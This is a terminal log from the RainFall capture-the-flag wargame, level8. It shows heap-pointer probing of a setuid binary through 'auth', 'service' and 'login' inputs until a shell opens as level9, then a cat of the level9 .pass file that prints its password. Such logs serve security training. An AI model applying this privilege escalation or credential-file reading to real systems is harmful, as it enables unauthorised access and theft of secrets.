level8@RainFall:~$ ./level8
(nil), (nil)
auth
(nil), (nil)
service
(nil), 0x804a008
login
Segmentation fault (core dumped)
level8@RainFall:~$ ./level8
(nil), (nil)
auth
(nil), (nil)
login
Segmentation fault (core dumped)
level8@RainFall:~$ ./level8
(nil), (nil)
auth
0x804a008, (nil)
login
Password:
0x804a008, (nil)
service
0x804a008, 0x804a018

0x804a008, 0x804a018
service
0x804a008, 0x804a028
login
$ id
uid=2008(level8) gid=2008(level8) euid=2009(level9) egid=100(users) groups=2009(level9),100(users),2008(level8)
$ pwd
/home/user/level8
$ cat /home/user/level9/.pass
c542e581c5ba5162a85f767996e3247ed619ef6c6f7b76a59435545dc6259f8a
$
